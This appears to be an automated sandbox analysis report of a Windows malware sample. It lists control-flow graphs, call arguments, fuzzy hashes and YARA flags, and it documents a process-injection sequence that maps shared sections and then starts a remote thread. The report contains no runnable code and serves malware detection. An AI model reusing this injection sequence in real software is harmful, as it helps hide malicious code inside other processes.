                                          control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 100 401547 97->100 101 4015bd-4015d4 97->101 98->91 99 40152a-401535 98->99 99->96 105 401537-401543 99->105 102 401596-4015a6 100->102 103 401549-40154b 100->103 106 4015a8 102->106 103->106 107 40154d-40156d 103->107 105->97 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 136 401660-401677 NtDuplicateObject 126->136 127->128 136->127 138 40167d-4016a1 NtCreateSection 136->138 140 4016a3-4016c4 NtMapViewOfSection 138->140 141 4016fd-401723 NtCreateSection 138->141 140->141 144 4016c6-4016e2 NtMapViewOfSection 140->144 141->127 142 401729-40172d 141->142 142->127 146 401733-401754 NtMapViewOfSection 142->146 144->141 145 4016e4-4016fa 144->145 145->141 146->127 148 40175a-401776 NtMapViewOfSection 146->148 148->127 152 40177c 148->152 152->127 153 40177c call 401781 152->153 153->127
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                          • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 178 401660-401677 NtDuplicateObject 168->178 169->170 178->169 180 40167d-4016a1 NtCreateSection 178->180 182 4016a3-4016c4 NtMapViewOfSection 180->182 183 4016fd-401723 NtCreateSection 180->183 182->183 186 4016c6-4016e2 NtMapViewOfSection 182->186 183->169 184 401729-40172d 183->184 184->169 188 401733-401754 NtMapViewOfSection 184->188 186->183 187 4016e4-4016fa 186->187 187->183 188->169 190 40175a-401776 NtMapViewOfSection 188->190 190->169 194 40177c 190->194 194->169 195 40177c call 401781 194->195 195->169
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                          • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                          Control-flow Graph (function starting at 4015df)
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                          • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                          Control-flow Graph (function starting at 4015f2)
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                          • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                          Control-flow Graph (function starting at 4015e6)
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                          • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                          Control-flow Graph (function starting at 403043; calls RtlCreateUserThread, NtTerminateProcess)
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                          Control-flow Graph (function starting at 52003c; calls VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA)
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0052024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_520000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 919b4ee4c9051b2d158f225995026eaa3ecd924755c0c65d7b99845caff89d7f
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 4C526A75A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E54DAB392DB30AE85DF14

                                          Control-flow Graph (function starting at 58f34d)
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0058F375
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0058F395
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0057D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_57d000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 99d5912cafa7b642599cd3254c1fd44afca33a246eb9c85df19d6e68ee229d71
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: C5F01236600715AFD7203AF5A88DA6A7AE8BF4D725F100939FA46E14C0DB74E8458761

                                          Control-flow Graph (function starting at 520e0f)
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00520223,?,?), ref: 00520E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00520223,?,?), ref: 00520E1E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_520000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: a764e639832798b8d740d17924903a9f0c649362d611a0acc80e9a5e0a88a39a
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 75D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DD90C1C770994046E5

                                          Control-flow Graph (function starting at 401991)
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                          • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                          • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                          • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                          Control-flow Graph (function starting at 4019a9)
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                          • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                          • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                          • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                          Control-flow Graph (function starting at 4019af)
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                          • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                          • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                          • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                          Control-flow Graph (function starting at 4019b8)
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                          • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                          • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                          • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

                                          Control-flow Graph (function starting at 58f00c)
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0058F05D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0057D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_57d000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: fa708f404b4140f41c0418234829f32c27fbbdf9cf5d6a7240e88281e8bb790f
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 2D113279A00208EFDB01DF98C985E98BFF5AF08350F0580A4F9489B362D771EA50DF40